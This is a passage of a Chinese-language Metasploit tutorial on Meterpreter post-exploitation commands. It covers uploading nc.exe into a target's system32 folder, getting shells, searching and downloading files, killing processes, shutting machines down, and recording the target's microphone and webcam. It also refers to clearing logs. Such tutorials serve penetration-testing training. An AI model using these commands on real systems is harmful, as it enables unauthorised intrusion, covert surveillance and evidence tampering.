MSF使用之meterpreter模块 (2)

MSF使用之meterpreter模块

MSF使用之meterpreter模块

这时候再去查看已经没有日志了,只有一条日志成功清除的记录 

download:下载目标系统的文件到 “lpwd” 目录下

upload:上传文件,upload /usr/share/windows-binaries/nc.exe C:\\WINDOWS\\system32,“\”有转义符的意思,我们这里需要两条“\”

execute:执行命令,-f 后面跟需要执行的命令

和cmd交互:execute -f cmd.exe -i,直接输入shell也能获得操作系统的shell

ps:查看目标正在运行的进程

netstat:查看目标的网络连接状况、端口开放情况

sysinfo:目标操作系统信息

kill:杀死进程

reboot:重启机器

shutdown:关闭机器

shell:获得操作系统的shell

show_mount:挂载了几个分区

search:搜索目标系统的上的文件

search -f win.ini

arp:查看目标机器的arp缓存

ipconfig / ifconfig:查看目标IP信息

route:查看路由表

可以添加、删除路由,可以通过route -h查看操作

idletime:目标操作系统已经空闲了多长时间,即多长时间没进行操作。时间久可以猜测用户不在计算机前。

resource:调用一个外部的资源文件

比如在Kali的“lpwd”目录创建一个 test.txt,里面填入“pwd”等命令,一条命令一行

resource test.txt

record_mic:用目标的麦克风记录声音

webcam_list:列出目标机器上的摄像头

webcam_snap:用摄像头拍照

webcam_snap -i 1 -v false:每隔1秒拍一次照

三、Meterpreter Python扩展

目标机器无需安装Python运行环境,就能运行原生Python代码。

这个扩展以插件的形式存在,我们需要先加载这个加载:

load python

python_execute "print (\'hello\')",直接执行python代码

python_execute "import os; cd = os.getcwd()" -r cd,将os.getcwd()赋值给 cd 这个变量,然后用 -r cd 读取 cd 这个变量的值

python_import -f test.py,导入一个写好的python脚本

# test.py
import os print(os.getcwd())

内容版权声明:除非注明,否则皆为本站原创文章。

转载注明出处:https://www.heiqu.com/zzdxdw.html